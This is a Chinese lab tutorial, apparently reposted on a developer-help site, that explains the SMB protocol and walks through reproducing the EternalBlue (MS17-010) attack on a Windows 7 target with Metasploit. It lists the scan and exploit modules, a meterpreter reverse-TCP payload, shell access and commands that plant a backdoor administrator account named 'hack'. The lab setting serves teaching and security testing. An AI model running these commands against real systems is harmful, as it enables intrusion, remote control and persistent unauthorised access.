概述
一、基础知识介绍:
1.何为永恒之蓝?
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
2.什么是SMB协议?
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
3.SMB工作原理是什么?
(1):首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。
(2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。
(3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。
(4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。
二、实验环境:
1.使用kali 和windows 7旗舰版(kali作为攻击主机,windows 7旗舰版作为靶机),使用wireshark进行抓包
2.设置kali 的IP地址为自动获取,查看kali IP地址:ifconfig
3.设置windows 7的IP地址为自动获取,查看windows 7的IP地址:ipconfig
三、实验步骤:
1.测试两台主机的连通性:用kali 去Ping windows 7的主机,来测试连通性
可以看见两台主机连通性良好
2.查看kali 主机数据库是否开启:service postgresql status
由上图可以看出:Active:inactive (dead)说明数据库此时是关闭的;
3.打开kali 主机的数据库: service postgresql start
4.再次查看kali 主机的数据库:service postgresql status
由上图可以看出:Active:active (exited)说明此时数据库已经打开
5.进行msfdb 数据库初始化,配置数据库相关信息:msfdb init
此时就可以进行永恒之蓝漏洞扫描,(永恒之蓝利用的是ms17_010漏洞,因此到这一步之后的任务就是在kali 里寻找ms17_010漏洞,并且利用该漏洞进行攻击,获得windows 7 的管理员权限)
6.启动msf:msfconsole这样就成功进入了msf中,如果你的界面与该界面不同,不必诧异,msf每次都会有一个随机的界面
7 输入 代码
扫描命令:use auxiliary/scanner/smb/smb_ms17_010
设置扫描的主机:set rhosts 192.168.175.166
输入run执行扫描
8
使用ms17_010模块进行漏洞扫描
search ms17-010
第一个是攻击命令,第二个是扫描命令
开始攻击
use exploit/windows/smb/ms17_010_eternalblue
显示未配置有效负载,默认为windows/x64/MeterMeter/reverseu tcp
配置有效负载
set payload windows/x64/meterpreter/reverse_tcp
设置攻击目标(靶机):set rhosts 192.168.175.166
本机默认就行
查看配置: show options
run或exploit进行攻击
显示下图页面就说明攻击成功了
查看主机系统信息 IP 用户
获得shell控制台:shell
进行后门植入(创建新的管理员账户)
net user hack 123456 /add //在windows 7上创建一个hack的用户,以便下次访问
net localgroup administrators hack /add //将hack加入到windows 7的本地管理员组中,以便获得更大权限
net user //查看windows 7本地用户
net localgroup administrators //查看windows 7本地管理员
由上图可以看出来,的确将hack添加到windows 7 中,这样可以方便下次继续访问
自此,利用永恒之蓝漏洞攻击一台主机就结束了,现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。
最后
以上就是务实小懒虫为你收集整理的永恒之蓝复现的全部内容,希望文章能够帮你解决永恒之蓝复现所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复